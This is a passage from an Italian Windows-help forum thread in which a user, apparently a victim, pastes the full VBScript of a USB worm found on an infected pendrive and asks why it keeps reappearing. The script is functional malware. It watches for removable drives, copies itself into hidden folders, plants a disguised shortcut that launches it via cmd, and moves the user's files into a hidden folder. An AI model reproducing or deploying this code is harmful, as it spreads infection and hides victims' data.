Visualizzazione dei risultati da 1 a 10 su 14

Hybrid View

  1. #1
    Moderatore di Windows e software L'avatar di URANIO
    Registrato dal
    Dec 1999
    residenza
    Casalpusterlengo (LO)
    Messaggi
    1,291

  2. #2
    Quote Originariamente inviata da URANIO Visualizza il messaggio
    E questo virus ti sposta semplicemente i file? ò.ò
    Effettivamente appena ho inserito una pendrive "infetta" in un altro pc, il problema si è ripresentato, spulciando fra i file nascosti che questo programma mi crea, ho scoperto che ci sono dei file di installazione. Ed il collegamento che mi crea in realtùà è un installatore (porta la directory %COMSPEC% /C .\WindowsServices\movemenoreg.vbs), che infamata...
    Guarda te poi, alla fine è uno script del cavolo...
    on error resume nextDIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
    strComputer = "."
    Set ws = WScript.CreateObject("WScript.Shell")


    Target = "\WindowsServices"




    'where are we?
    strPath = WScript.ScriptFullName
    set objws = CreateObject("Scripting.FileSystemObject")
    Set objFile = objws.GetFile(strPath)
    strFolder = objws.GetParentFolderName(objFile)








    'Checking for USB instance
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")




    Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")




    While True


    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    call procheck(colProcess, "helper.vbs")

    Set objEvent = colEvents.NextEvent



    If objEvent.TargetInstance.DriveType = 2 Then
    If objEvent.Path_.Class = "__InstanceCreationEvent" Then
    device = objEvent.TargetInstance.DeviceID
    devicename = objEvent.TargetInstance.VolumeName
    DestFolder = device & "\WindowsServices"
    DummyFolder = device & "\" & "_"
    if (not objws.folderexists(DestFolder)) then
    objws.CreateFolder DestFolder
    Set objDestFolder = objws.GetFolder(DestFolder)
    objDestFolder.Attributes = objDestFolder.Attributes + 39
    end if

    Call moveandhide ("\helper.vbs")
    Call moveandhide ("\installer.vbs")
    Call moveandhide ("\movemenoreg.vbs")
    Call moveandhide ("\WindowsServices.exe")

    if (not objws.fileexists (device & devicename & ".lnk")) then
    Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
    link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
    link.TargetPath = "%COMSPEC%"
    link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
    link.windowstyle = 7
    link.Save
    End If


    if (not objws.folderexists(DummyFolder)) then
    objws.CreateFolder DummyFolder
    Set objDestFolder = objws.GetFolder(DummyFolder)
    objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
    End If
    set check = objws.getFolder(device)
    Call checker(check)

    End If
    End If





    Wend










    sub checker (path)
    set home = path.Files
    For Each file in home
    Select Case file.Name
    Case devicename & ".lnk"
    'nothings
    Case Else
    objws.MoveFile path & file.Name, DummyFolder & "\"
    End Select

    Next

    set home = path.SubFolders
    For Each home in home
    Select Case home
    Case path & "_"
    'nothings
    Case path & "WindowsServices"
    'nothings
    Case path & "System Volume Information"
    'nothings'
    Case Else
    objws. MoveFolder home, DummyFolder & "\"
    End Select

    Next

    end sub




    '------------------------------------------------------------




    sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
    objws.CopyFile strFolder & name, DestFolder & "\"
    Set objmove = objws.GetFile(DestFolder & name)


    If not objmove.Attributes AND 39 then
    objmove.Attributes = 0
    objmove.Attributes = objmove.Attributes + 39
    end if


    end if
    end sub






    '------------------------------------------------------------




    sub procheck(checkme, procname)


    For Each objProcess In checkme
    vaprocess = objProcess.CommandLine

    if instr(vaprocess, procname) then
    Exit sub
    End if

    Next
    ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
    end sub
    EDIT2: Purtroppo non si risolve, cancello il file dall'esecuzione automatica, ma si ricrea un istante dopo. Deve esserci qualche servizio in esecuzione che lo ricrea...
    Ultima modifica di XSparter; 29-06-2016 a 11:51

Tag per questa discussione

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2026 vBulletin Solutions, Inc. All rights reserved.